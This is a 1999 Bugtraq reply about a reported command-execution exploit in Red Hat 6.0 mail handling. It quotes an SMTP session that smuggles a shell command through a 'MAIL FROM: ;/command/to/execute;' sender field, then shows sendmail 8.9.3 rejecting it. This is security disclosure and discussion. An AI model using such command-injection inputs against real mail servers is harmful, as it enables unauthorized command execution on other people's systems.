[12163] in bugtraq
RH6.0 local/remote command execution
daemon@ATHENA.MIT.EDU (Neezam Haniff)
Fri Oct 8 16:04:16 1999
Content-Type: text
Message-Id: <199910061749.NAA01688@www.rcc.ryerson.ca>
Date: Wed, 6 Oct 1999 13:49:59 -0400
Reply-To: Neezam Haniff <nhaniff@WWW.RCC.RYERSON.CA>
From: Neezam Haniff <nhaniff@WWW.RCC.RYERSON.CA>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
Here are some comments below...
> The remote exploit is merely:
> bash-2.03$ telnet localhost 25
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
> (CDT)
> MAIL FROM: ;/command/to/execute;
> 250 <;/command/to/execute;> ... Sender Okay
> RCPT TO: rpmmail
> 250 <rpmmail> ... Recipient Okay
> data
> 354 Enter mail, end with "." on a line by itself
> .
> 250 Mail accepted
> quit
>
I find this odd that this exploit could exist on a Red Hat 6.0 installation.
sendmail 8.9.3 is the mailer that is installed and the way it's been
configured, there's no way it would accept that sender address since it's
not qualifiable. Please confirm this. This is what I get when I test this
scenario on a Red Hat 6.0 system:
[nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;
553 ;/command/to/execute;... Domain name required
The only way someone could take advantage of this exploit is if their mailer
configuration allows for the sender to non-qualifiable.
Neezam.
